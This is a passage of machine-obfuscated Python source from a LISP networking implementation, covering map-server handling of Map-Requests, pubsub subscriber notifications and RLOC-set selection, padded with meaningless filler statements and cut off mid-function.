if 93 - 93: O0 * OoOoOO00 * iIii1I11I1II1
if 3 - 3: I1ii11iIi11i - O0
if 46 - 46: iII111i
if 99 - 99: oO0o
def lisp_get_partial_rloc_set ( registered_rloc_set , mr_source , multicast ) :
o0ooOo000Oo0 = [ ]
OO00O000OOO = [ ]
if 16 - 16: ooOoO0o % iII111i - o0oOOo0O0Ooo % I11i + i11iIiiIii
if 6 - 6: i11iIiiIii
if 66 - 66: I1Ii111 * I1ii11iIi11i . Ii1I
if 28 - 28: oO0o - I1IiiI
if 42 - 42: i1IIi
if 8 - 8: Ii1I - oO0o
OO0i1 = False
ooO0Oo0 = False
for OOOoOoo in registered_rloc_set :
if ( OOOoOoo . priority != 254 ) : continue
ooO0Oo0 |= True
if ( OOOoOoo . rloc . is_exact_match ( mr_source ) == False ) : continue
OO0i1 = True
break
if 74 - 74: i1IIi
if 3 - 3: OoO0O00 - o0oOOo0O0Ooo - Ii1I
if 33 - 33: ooOoO0o + I1ii11iIi11i - I1IiiI . iII111i / OoO0O00
if 91 - 91: OOooOOo - OoooooooOO . OoO0O00
if 34 - 34: Ii1I . I1IiiI . i1IIi * I1ii11iIi11i
if 77 - 77: ooOoO0o . II111iiii
if 41 - 41: IiII
if ( ooO0Oo0 == False ) : return ( registered_rloc_set )
if 27 - 27: IiII / IiII
if 91 - 91: Ii1I
if 93 - 93: OoO0O00 * OoO0O00 * I1ii11iIi11i * OoO0O00 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 * OoO0O00 - ooOoO0o - Oo0Ooo . OoO0O00 % oO0o
if 98 - 98: OoO0O00 . i1IIi
if 58 - 58: i1IIi * O0 + I1ii11iIi11i . IiII
if 11 - 11: OOooOOo + iIii1I11I1II1 - ooOoO0o * OoO0O00 * i11iIiiIii
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 7 - 7: Oo0Ooo + ooOoO0o - I1Ii111 * iIii1I11I1II1
if 6 - 6: ooOoO0o % I1Ii111 % ooOoO0o . Ii1I * Oo0Ooo . IiII
OoooO0oo0o0 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 39 - 39: o0oOOo0O0Ooo
if 73 - 73: IiII
if 92 - 92: OOooOOo / ooOoO0o . I1Ii111 . iII111i / ooOoO0o
if 83 - 83: iIii1I11I1II1 - OoO0O00 - I1Ii111
if 27 - 27: IiII - iII111i * i11iIiiIii % i11iIiiIii + OoOoOO00 . I1Ii111
for OOOoOoo in registered_rloc_set :
if ( OoooO0oo0o0 and OOOoOoo . rloc . is_private_address ( ) ) : continue
if ( multicast == False and OOOoOoo . priority == 255 ) : continue
if ( multicast and OOOoOoo . mpriority == 255 ) : continue
if ( OOOoOoo . priority == 254 ) :
o0ooOo000Oo0 . append ( OOOoOoo )
else :
OO00O000OOO . append ( OOOoOoo )
if 10 - 10: IiII / i11iIiiIii
if 6 - 6: I11i - OOooOOo
if 100 - 100: Oo0Ooo / OOooOOo + iII111i - o0oOOo0O0Ooo + OoO0O00 % IiII
if 91 - 91: Ii1I % I11i % Oo0Ooo / OoO0O00 - II111iiii - o0oOOo0O0Ooo
if 50 - 50: OoooooooOO
if 51 - 51: II111iiii - oO0o % OoooooooOO - II111iiii / O0 - OoooooooOO
if ( OO0i1 ) : return ( OO00O000OOO )
if 21 - 21: iII111i * o0oOOo0O0Ooo
if 85 - 85: I1ii11iIi11i . OoOoOO00 . i1IIi % OOooOOo * I11i . I1Ii111
if 26 - 26: I1Ii111 + Oo0Ooo + II111iiii % OoOoOO00 % OOooOOo
if 40 - 40: I1ii11iIi11i + i1IIi
if 9 - 9: OOooOOo
if 74 - 74: OoOoOO00 - OOooOOo % OoOoOO00
if 82 - 82: I11i % IiII + Oo0Ooo + iIii1I11I1II1 - I11i - I1IiiI
if 65 - 65: IiII / O0 * II111iiii + oO0o
if 52 - 52: o0oOOo0O0Ooo - OoOoOO00 * II111iiii / OoooooooOO
if 44 - 44: OOooOOo - oO0o + o0oOOo0O0Ooo - i1IIi % o0oOOo0O0Ooo
if 79 - 79: iII111i . iIii1I11I1II1
if 42 - 42: i11iIiiIii / IiII . O0 / OOooOOo . iII111i * i1IIi
OO00O000OOO = [ ]
for OOOoOoo in registered_rloc_set :
if ( OOOoOoo . rloc . is_ipv6 ( ) ) : OO00O000OOO . append ( OOOoOoo )
if ( OOOoOoo . rloc . is_private_address ( ) ) : OO00O000OOO . append ( OOOoOoo )
if 83 - 83: iIii1I11I1II1 . II111iiii * Oo0Ooo . I1IiiI - I1IiiI - iIii1I11I1II1
OO00O000OOO += o0ooOo000Oo0
return ( OO00O000OOO )
if 29 - 29: Oo0Ooo
if 35 - 35: OoOoOO00 + II111iiii
if 46 - 46: O0 / I1ii11iIi11i + OOooOOo - I1Ii111 + I1IiiI - ooOoO0o
if 96 - 96: IiII + i1IIi - I11i * I11i - OoO0O00 % II111iiii
if 47 - 47: I1Ii111 . i11iIiiIii + oO0o . I1ii11iIi11i
if 12 - 12: iIii1I11I1II1 % I1Ii111 * OoOoOO00 / OoooooooOO % OoooooooOO
if 81 - 81: iIii1I11I1II1 - Oo0Ooo - ooOoO0o . OoO0O00 + I1ii11iIi11i
if 84 - 84: iII111i . OOooOOo . iII111i * oO0o % Ii1I . oO0o
if 86 - 86: iII111i * ooOoO0o / iIii1I11I1II1 + Ii1I . iII111i
if 64 - 64: IiII - Oo0Ooo % iII111i % I11i
def lisp_store_pubsub_state ( reply_eid , itr_rloc , mr_sport , nonce , ttl , xtr_id ) :
iIiI1IIi1Ii1i = lisp_pubsub ( itr_rloc , mr_sport , nonce , ttl , xtr_id )
iIiI1IIi1Ii1i . add ( reply_eid )
return ( iIiI1IIi1Ii1i )
if 28 - 28: I1IiiI - I1Ii111
if 60 - 60: OOooOOo / O0 * o0oOOo0O0Ooo * OoooooooOO
if 95 - 95: II111iiii
if 2 - 2: I11i - OoooooooOO / I1ii11iIi11i . I1ii11iIi11i * i11iIiiIii % II111iiii
if 1 - 1: i11iIiiIii / OoOoOO00 - I1ii11iIi11i . I1IiiI / I1Ii111 % iIii1I11I1II1
if 87 - 87: OoOoOO00 - II111iiii + Oo0Ooo
if 44 - 44: i1IIi + I1ii11iIi11i / iIii1I11I1II1
if 47 - 47: I1Ii111
if 41 - 41: IiII
if 25 - 25: I11i % iIii1I11I1II1
if 27 - 27: iIii1I11I1II1 . O0 . oO0o
if 21 - 21: oO0o * I1ii11iIi11i
if 44 - 44: o0oOOo0O0Ooo * IiII - o0oOOo0O0Ooo
if 90 - 90: i1IIi + I1ii11iIi11i * oO0o % i11iIiiIii - OoO0O00
if 12 - 12: OoO0O00 . I1ii11iIi11i - I1IiiI % OOooOOo
def lisp_convert_reply_to_notify ( packet ) :
if 9 - 9: Ii1I / O0
if 95 - 95: iII111i / I11i
if 86 - 86: O0 / II111iiii . Oo0Ooo / Oo0Ooo * II111iiii
if 22 - 22: Ii1I
oo0OOo00OOoO = struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ]
oo0OOo00OOoO = socket . ntohl ( oo0OOo00OOoO ) & 0xff
o0Oo0o = packet [ 4 : 12 ]
packet = packet [ 12 : : ]
if 5 - 5: I1Ii111 * I1IiiI * O0 + I1Ii111
if 19 - 19: i11iIiiIii / IiII - i1IIi - I1IiiI * I11i
if 43 - 43: IiII * Oo0Ooo / OoOoOO00 + I1IiiI - i11iIiiIii + II111iiii
if 81 - 81: I11i / Oo0Ooo % Ii1I % OoO0O00
iIiIii = ( LISP_MAP_NOTIFY << 28 ) | oo0OOo00OOoO
IiIii1iIIII = struct . pack ( "I" , socket . htonl ( iIiIii ) )
i111 = struct . pack ( "I" , 0 )
if 87 - 87: O0 % II111iiii
if 42 - 42: I1IiiI . i1IIi
if 98 - 98: o0oOOo0O0Ooo % I11i . Oo0Ooo * Oo0Ooo % iII111i
if 37 - 37: OoO0O00 / I1Ii111 . I1Ii111 * i1IIi
packet = IiIii1iIIII + o0Oo0o + i111 + packet
return ( packet )
if 22 - 22: I1ii11iIi11i . II111iiii + iIii1I11I1II1 / OoooooooOO . ooOoO0o
if 13 - 13: II111iiii
if 36 - 36: iII111i - oO0o / Oo0Ooo / O0 . OoO0O00 . i1IIi
if 19 - 19: O0 . OoooooooOO % iIii1I11I1II1 - Ii1I . Ii1I + I1IiiI
if 98 - 98: oO0o . Oo0Ooo
if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
def lisp_notify_subscribers ( lisp_sockets , eid_record , rloc_records ,
registered_eid , site ) :
if 64 - 64: OoooooooOO + OOooOOo
for IIi1II1I in lisp_pubsub_cache :
for iIiI1IIi1Ii1i in list ( lisp_pubsub_cache [ IIi1II1I ] . values ( ) ) :
oO0ooOOO = iIiI1IIi1Ii1i . eid_prefix
if ( oO0ooOOO . is_more_specific ( registered_eid ) == False ) : continue
if 57 - 57: I1Ii111 / OoO0O00 . OoOoOO00 % I1IiiI - OoO0O00 % o0oOOo0O0Ooo
oO0oO00OO00 = iIiI1IIi1Ii1i . itr
ooO0 = iIiI1IIi1Ii1i . port
Oooo000 = red ( oO0oO00OO00 . print_address_no_iid ( ) , False )
Oo0Oo0o = bold ( "subscriber" , False )
oOOOOOo0OO0o0oOO0 = "0x" + lisp_hex_string ( iIiI1IIi1Ii1i . xtr_id )
o0Oo0o = "0x" + lisp_hex_string ( iIiI1IIi1Ii1i . nonce )
if 64 - 64: OoO0O00 * Oo0Ooo . II111iiii * Oo0Ooo % ooOoO0o - IiII
lprint ( " Notify {} {}:{} xtr-id {} for {}, nonce {}" . format ( Oo0Oo0o , Oooo000 , ooO0 , oOOOOOo0OO0o0oOO0 , green ( IIi1II1I , False ) , o0Oo0o ) )
if 40 - 40: Ii1I - OOooOOo % I1Ii111 * oO0o
if 17 - 17: ooOoO0o - Ii1I * Ii1I % I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 71 - 71: OOooOOo . IiII / ooOoO0o
if 23 - 23: o0oOOo0O0Ooo * iIii1I11I1II1 - OoooooooOO - OoOoOO00
if 59 - 59: Ii1I - ooOoO0o / Ii1I - oO0o - iII111i
if 10 - 10: I1Ii111 . Oo0Ooo . Ii1I . i11iIiiIii / OoooooooOO
o0o0 = copy . deepcopy ( eid_record )
o0o0 . eid . copy_address ( oO0ooOOO )
o0o0 = o0o0 . encode ( ) + rloc_records
lisp_build_map_notify ( lisp_sockets , o0o0 , [ IIi1II1I ] , 1 , oO0oO00OO00 ,
ooO0 , iIiI1IIi1Ii1i . nonce , 0 , 0 , 0 , site , False )
if 64 - 64: II111iiii % I1ii11iIi11i . OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i
iIiI1IIi1Ii1i . map_notify_count += 1
if 43 - 43: OoooooooOO * I1IiiI
if 2 - 2: OOooOOo / oO0o + I1ii11iIi11i + i11iIiiIii % iIii1I11I1II1 . I1ii11iIi11i
return
if 100 - 100: Oo0Ooo * ooOoO0o + Ii1I / iII111i * o0oOOo0O0Ooo
if 26 - 26: I1Ii111 * OoOoOO00
if 38 - 38: II111iiii
if 50 - 50: OoOoOO00 . IiII - OOooOOo
if 46 - 46: iIii1I11I1II1
if 97 - 97: O0 * OOooOOo - o0oOOo0O0Ooo % o0oOOo0O0Ooo * II111iiii % I11i
if 65 - 65: iIii1I11I1II1 / OOooOOo
def lisp_process_pubsub ( lisp_sockets , packet , reply_eid , itr_rloc , port , nonce ,
ttl , xtr_id ) :
if 2 - 2: I11i - OOooOOo / o0oOOo0O0Ooo
if 14 - 14: I11i + Oo0Ooo + i11iIiiIii - i1IIi . O0
if 47 - 47: o0oOOo0O0Ooo / i1IIi * IiII
if 50 - 50: I11i
iIiI1IIi1Ii1i = lisp_store_pubsub_state ( reply_eid , itr_rloc , port , nonce , ttl ,
xtr_id )
if 9 - 9: iII111i . OoOoOO00 * iII111i
o0Ooo0Oooo0o = green ( reply_eid . print_prefix ( ) , False )
oO0oO00OO00 = red ( itr_rloc . print_address_no_iid ( ) , False )
OoooO00OoooOo = bold ( "Map-Notify" , False )
xtr_id = "0x" + lisp_hex_string ( xtr_id )
lprint ( "{} pubsub request for {} to ack ITR {} xtr-id: {}" . format ( OoooO00OoooOo ,
o0Ooo0Oooo0o , oO0oO00OO00 , xtr_id ) )
if 49 - 49: i1IIi * II111iiii * Oo0Ooo % oO0o / II111iiii
if 8 - 8: I1IiiI . o0oOOo0O0Ooo / OoooooooOO - II111iiii
if 93 - 93: OoOoOO00 / OoOoOO00 / OoOoOO00
if 74 - 74: ooOoO0o % Oo0Ooo - iII111i - I1IiiI
packet = lisp_convert_reply_to_notify ( packet )
lisp_send_map_notify ( lisp_sockets , packet , itr_rloc , port )
iIiI1IIi1Ii1i . map_notify_count += 1
return
if 51 - 51: i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
def lisp_ms_process_map_request ( lisp_sockets , packet , map_request , mr_source ,
mr_sport , ecm_source ) :
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
if 54 - 54: Ii1I - o0oOOo0O0Ooo + OoOoOO00 / OoooooooOO
if 61 - 61: I11i / IiII % OoooooooOO - i11iIiiIii * i1IIi % o0oOOo0O0Ooo
o0Ooo0Oooo0o = map_request . target_eid
oo0oOooo0O = map_request . target_group
i1iiii = lisp_print_eid_tuple ( o0Ooo0Oooo0o , oo0oOooo0O )
iiII1 = map_request . itr_rlocs [ 0 ]
oOOOOOo0OO0o0oOO0 = map_request . xtr_id
o0Oo0o = map_request . nonce
oOoO0OooO0O = LISP_NO_ACTION
iIiI1IIi1Ii1i = map_request . subscribe_bit
if 67 - 67: o0oOOo0O0Ooo - Ii1I
if 29 - 29: OoOoOO00 . I1ii11iIi11i
if 24 - 24: OOooOOo + i1IIi . I11i . OoOoOO00 + OoooooooOO
if 98 - 98: ooOoO0o + i1IIi / I1IiiI
if 1 - 1: IiII . OoooooooOO + II111iiii
iiIi11i1ii1I = True
iiiI1i = ( lisp_get_eid_hash ( o0Ooo0Oooo0o ) != None )
if ( iiiI1i ) :
O0OoO0ooOoo = map_request . map_request_signature
if ( O0OoO0ooOoo == None ) :
iiIi11i1ii1I = False
lprint ( ( "EID-crypto-hash signature verification {}, " + "no signature found" ) . format ( bold ( "failed" , False ) ) )
if 91 - 91: II111iiii / iIii1I11I1II1 / OoOoOO00 . II111iiii
else :
OO00O = map_request . signature_eid
oOo0oO0o , ooOoI1IiiI , iiIi11i1ii1I = lisp_lookup_public_key ( OO00O )
if ( iiIi11i1ii1I ) :
iiIi11i1ii1I = map_request . verify_map_request_sig ( ooOoI1IiiI )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( OO00O . print_address ( ) , oOo0oO0o . print_address ( ) ) )
if 18 - 18: OoO0O00 - I11i / OOooOOo / oO0o
if 53 - 53: I1ii11iIi11i % i1IIi . i11iIiiIii
I1I1i = bold ( "passed" , False ) if iiIi11i1ii1I else bold ( "failed" , False )
lprint ( "EID-crypto-hash signature verification {}" . format ( I1I1i ) )
if 28 - 28: OOooOOo / I1IiiI / IiII + I1IiiI / O0 / I11i
if 10 - 10: I1Ii111 * i1IIi
if 48 - 48: Oo0Ooo % i1IIi / iII111i . O0
if ( iIiI1IIi1Ii1i and iiIi11i1ii1I == False ) :
iIiI1IIi1Ii1i = False
lprint ( "Suppress creating pubsub state due to signature failure" )
if 27 - 27: I11i + iIii1I11I1II1 - i11iIiiIii
if 81 - 81: I11i + oO0o * iIii1I11I1II1 * IiII
if 7 - 7: I11i - I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
if 32 - 32: ooOoO0o
if 9 - 9: I1Ii111
if 77 - 77: OoooooooOO * I1Ii111
if 63 - 63: IiII * oO0o * iIii1I11I1II1
if 18 - 18: II111iiii * o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
if 40 - 40: oO0o - o0oOOo0O0Ooo * II111iiii
if 4 - 4: O0
if 9 - 9: Oo0Ooo . i1IIi - i1IIi + I1Ii111 * ooOoO0o . I1ii11iIi11i
if 17 - 17: I11i * I1ii11iIi11i % I1IiiI + OoO0O00 + IiII
if 90 - 90: OoooooooOO - I1IiiI / I1ii11iIi11i + oO0o - o0oOOo0O0Ooo
if 84 - 84: OoOoOO00 + O0 % Oo0Ooo
iiii1I1I11 = iiII1 if ( iiII1 . afi == ecm_source . afi ) else ecm_source
if 88 - 88: oO0o % ooOoO0o - i11iIiiIii + oO0o
i1iI11i = lisp_site_eid_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if 9 - 9: OOooOOo + Oo0Ooo
if ( i1iI11i == None or i1iI11i . is_star_g ( ) ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( "{} for requested EID {}" . format ( oo0oO0Oo ,
green ( i1iiii , False ) ) )
if 41 - 41: II111iiii . i1IIi
if 78 - 78: I1IiiI * I11i % OOooOOo + Ii1I + OoOoOO00
if 23 - 23: iII111i / Oo0Ooo % OoooooooOO * OoooooooOO . iII111i / I1ii11iIi11i
if 30 - 30: oO0o - OoOoOO00 . I1IiiI
lisp_send_negative_map_reply ( lisp_sockets , o0Ooo0Oooo0o , oo0oOooo0O , o0Oo0o , iiII1 ,
mr_sport , 15 , oOOOOOo0OO0o0oOO0 , iIiI1IIi1Ii1i )
if 17 - 17: OoOoOO00
return ( [ o0Ooo0Oooo0o , oo0oOooo0O , LISP_DDT_ACTION_SITE_NOT_FOUND ] )
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
o0oo0OO0oO = i1iI11i . print_eid_tuple ( )
IIiii = i1iI11i . site . site_name
if 58 - 58: iIii1I11I1II1
if 15 - 15: IiII / OOooOOo / I11i + i1IIi
if 95 - 95: i1IIi + II111iiii . iIii1I11I1II1 . OoooooooOO + o0oOOo0O0Ooo / iIii1I11I1II1
if 40 - 40: OoO0O00 / O0
if 60 - 60: iIii1I11I1II1 / Oo0Ooo / oO0o + iII111i
if ( iiiI1i == False and i1iI11i . require_signature ) :
O0OoO0ooOoo = map_request . map_request_signature
OO00O = map_request . signature_eid
if ( O0OoO0ooOoo == None or OO00O . is_null ( ) ) :
lprint ( "Signature required for site {}" . format ( IIiii ) )
iiIi11i1ii1I = False
else :
OO00O = map_request . signature_eid
oOo0oO0o , ooOoI1IiiI , iiIi11i1ii1I = lisp_lookup_public_key ( OO00O )
if ( iiIi11i1ii1I ) :
iiIi11i1ii1I = map_request . verify_map_request_sig ( ooOoI1IiiI )
else :
lprint ( "Public-key lookup failed for sig-eid {}, hash-eid {}" . format ( OO00O . print_address ( ) , oOo0oO0o . print_address ( ) ) )
if 66 - 66: iIii1I11I1II1 . O0 * IiII . ooOoO0o + i1IIi
if 83 - 83: o0oOOo0O0Ooo / II111iiii + I1IiiI - iII111i + OoO0O00
I1I1i = bold ( "passed" , False ) if iiIi11i1ii1I else bold ( "failed" , False )
lprint ( "Required signature verification {}" . format ( I1I1i ) )
if 67 - 67: I1Ii111 - OoOoOO00 . i11iIiiIii - I1Ii111 . i11iIiiIii
if 25 - 25: I11i % I1Ii111 + Ii1I
if 46 - 46: ooOoO0o + Oo0Ooo + oO0o / II111iiii . iIii1I11I1II1 * I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if 91 - 91: oO0o
if 58 - 58: i11iIiiIii / Ii1I - OoooooooOO
if ( iiIi11i1ii1I and i1iI11i . registered == False ) :
lprint ( "Site '{}' with EID-prefix {} is not registered for EID {}" . format ( IIiii , green ( o0oo0OO0oO , False ) , green ( i1iiii , False ) ) )
if 25 - 25: i1IIi * ooOoO0o % OOooOOo / I1IiiI
if 75 - 75: i11iIiiIii
if 38 - 38: iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: I11i * II111iiii
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if ( i1iI11i . accept_more_specifics == False ) :
o0Ooo0Oooo0o = i1iI11i . eid
oo0oOooo0O = i1iI11i . group
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
O0O00O = 1
if ( i1iI11i . force_ttl != None ) :
O0O00O = i1iI11i . force_ttl | 0x80000000
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
if 3 - 3: O0 / I11i + OoOoOO00 % IiII / i11iIiiIii
lisp_send_negative_map_reply ( lisp_sockets , o0Ooo0Oooo0o , oo0oOooo0O , o0Oo0o , iiII1 ,
mr_sport , O0O00O , oOOOOOo0OO0o0oOO0 , iIiI1IIi1Ii1i )
if 25 - 25: II111iiii / I1ii11iIi11i % iIii1I11I1II1
return ( [ o0Ooo0Oooo0o , oo0oOooo0O , LISP_DDT_ACTION_MS_NOT_REG ] )
if 69 - 69: IiII
if 36 - 36: I1IiiI / oO0o
if 72 - 72: i1IIi - I1ii11iIi11i . OOooOOo + I1Ii111 - ooOoO0o
if 69 - 69: o0oOOo0O0Ooo * I1IiiI - I11i
if 11 - 11: OOooOOo * O0
Iiii1iiI = False
I1i1i = ""
oo00ooo0OOO00 = False
if ( i1iI11i . force_nat_proxy_reply ) :
I1i1i = ", nat-forced"
Iiii1iiI = True
oo00ooo0OOO00 = True
elif ( i1iI11i . force_proxy_reply ) :
I1i1i = ", forced"
oo00ooo0OOO00 = True
elif ( i1iI11i . proxy_reply_requested ) :
I1i1i = ", requested"
oo00ooo0OOO00 = True
elif ( map_request . pitr_bit and i1iI11i . pitr_proxy_reply_drop ) :
I1i1i = ", drop-to-pitr"
oOoO0OooO0O = LISP_DROP_ACTION
elif ( i1iI11i . proxy_reply_action != "" ) :
oOoO0OooO0O = i1iI11i . proxy_reply_action
I1i1i = ", forced, action {}" . format ( oOoO0OooO0O )
oOoO0OooO0O = LISP_DROP_ACTION if ( oOoO0OooO0O == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 56 - 56: I1ii11iIi11i * o0oOOo0O0Ooo - iII111i - ooOoO0o - I11i
if 9 - 9: I1IiiI / O0 + I11i
if 39 - 39: OoooooooOO * I1ii11iIi11i + II111iiii . I1Ii111 / II111iiii . I1ii11iIi11i
if 72 - 72: OoOoOO00
if 21 - 21: oO0o
if 58 - 58: OoOoOO00 + i11iIiiIii % OOooOOo - i1IIi
if 39 - 39: OoooooooOO . I1IiiI + OoOoOO00
oO0oOoo = False
O0o0Oo0oO0o0 = None
if ( oo00ooo0OOO00 and i1iI11i . policy in lisp_policies ) :
iIIiiIi = lisp_policies [ i1iI11i . policy ]
if ( iIIiiIi . match_policy_map_request ( map_request , mr_source ) ) : O0o0Oo0oO0o0 = iIIiiIi
if 39 - 39: OOooOOo / I1IiiI / iIii1I11I1II1 + Ii1I - i11iIiiIii
if ( O0o0Oo0oO0o0 ) :
iiI1I = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( iiI1I ,
iIIiiIi . policy_name , iIIiiIi . set_action ) )
else :
iiI1I = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( iiI1I ,
iIIiiIi . policy_name ) )
oO0oOoo = True
if 25 - 25: iII111i . OOooOOo * I1IiiI % OoO0O00 - O0 . I1IiiI
if 92 - 92: I11i * I1Ii111 . O0 - oO0o + i1IIi % Oo0Ooo
if 39 - 39: I1Ii111 - I1IiiI
if ( I1i1i != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( i1iiii , False ) , IIiii , green ( o0oo0OO0oO , False ) ,
# i1IIi . OoO0O00
I1i1i ) )
if 85 - 85: i11iIiiIii / OOooOOo / I11i - OOooOOo
OO00O000OOO = i1iI11i . registered_rlocs
O0O00O = 1440
if ( Iiii1iiI ) :
if ( i1iI11i . site_id != 0 ) :
OoiIii11i11i = map_request . source_eid
OO00O000OOO = lisp_get_private_rloc_set ( i1iI11i , OoiIii11i11i , oo0oOooo0O )
if 46 - 46: oO0o
if ( OO00O000OOO == i1iI11i . registered_rlocs ) :
IiIIIIi11ii = ( i1iI11i . group . is_null ( ) == False )
Oo0O0O0oo0 = lisp_get_partial_rloc_set ( OO00O000OOO , iiii1I1I11 , IiIIIIi11ii )
if ( Oo0O0O0oo0 != OO00O000OOO ) :
O0O00O = 15
OO00O000OOO = Oo0O0O0oo0
if 86 - 86: O0 - Oo0Ooo
if 80 - 80: o0oOOo0O0Ooo - I1Ii111 * O0 * iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i / OoO0O00
if 36 - 36: o0oOOo0O0Ooo + ooOoO0o * I11i
if 81 - 81: OOooOOo * I11i - I1ii11iIi11i
if 82 - 82: I1ii11iIi11i * II111iiii - OoooooooOO % iII111i * I1IiiI % OoOoOO00
if 81 - 81: I11i + o0oOOo0O0Ooo / iII111i
if 35 - 35: ooOoO0o % I11i * I1ii11iIi11i
if ( i1iI11i . force_ttl != None ) :
O0O00O = i1iI11i . force_ttl | 0x80000000
if 10 - 10: OoO0O00 + OoooooooOO + I1Ii111
if 57 - 57: Ii1I % Ii1I * Oo0Ooo % i11iIiiIii
if 12 - 12: oO0o . Oo0Ooo . I1IiiI - i11iIiiIii / o0oOOo0O0Ooo
if 54 - 54: i11iIiiIii + I1Ii111 . I1Ii111 * I1ii11iIi11i % I1Ii111 - OoooooooOO
if 76 - 76: IiII + i1IIi + i11iIiiIii . oO0o
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
if ( O0o0Oo0oO0o0 ) :
if ( O0o0Oo0oO0o0 . set_record_ttl ) :
O0O00O = O0o0Oo0oO0o0 . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( O0O00O ) )
if 66 - 66: iII111i % iII111i
if ( O0o0Oo0oO0o0 . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
oOoO0OooO0O = LISP_POLICY_DENIED_ACTION
OO00O000OOO = [ ]
else :
iIIiI11 = O0o0Oo0oO0o0 . set_policy_map_reply ( )
if ( iIIiI11 ) : OO00O000OOO = [ iIIiI11 ]
if 59 - 59: II111iiii . i1IIi % i1IIi
if 40 - 40: I1Ii111 . II111iiii * o0oOOo0O0Ooo + I11i - i1IIi
if 67 - 67: o0oOOo0O0Ooo - O0 - i1IIi . ooOoO0o . iII111i
if ( oO0oOoo ) :
lprint ( "Implied drop action, send negative Map-Reply" )
oOoO0OooO0O = LISP_POLICY_DENIED_ACTION
OO00O000OOO = [ ]
if 43 - 43: II111iiii . o0oOOo0O0Ooo + i11iIiiIii . O0 / O0 . II111iiii
if 13 - 13: Ii1I % i11iIiiIii
O00oooO0 = i1iI11i . echo_nonce_capable
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if ( iiIi11i1ii1I ) :
ooIiIII1 = i1iI11i . eid
i1I = i1iI11i . group
else :
ooIiIII1 = o0Ooo0Oooo0o
i1I = oo0oOooo0O
oOoO0OooO0O = LISP_AUTH_FAILURE_ACTION
OO00O000OOO = [ ]
if 20 - 20: I11i / OoooooooOO - I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if ( iIiI1IIi1Ii1i ) :
ooIiIII1 = o0Ooo0Oooo0o
i1I = oo0oOooo0O
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
if 48 - 48: O0 / i1IIi / iII111i
if 11 - 11: O0 - OoO0O00 + OoOoOO00 * ooOoO0o - Ii1I
if 82 - 82: Ii1I - O0 * ooOoO0o . ooOoO0o
if 32 - 32: o0oOOo0O0Ooo . OoooooooOO % OOooOOo
if 2 - 2: OoOoOO00 + I1ii11iIi11i + oO0o
packet = lisp_build_map_reply ( ooIiIII1 , i1I , OO00O000OOO ,
o0Oo0o , oOoO0OooO0O , O0O00O , map_request , None , O00oooO0 , False )
if 27 - 27: OoooooooOO - Ii1I / OoooooooOO + OoO0O00
if ( iIiI1IIi1Ii1i ) :
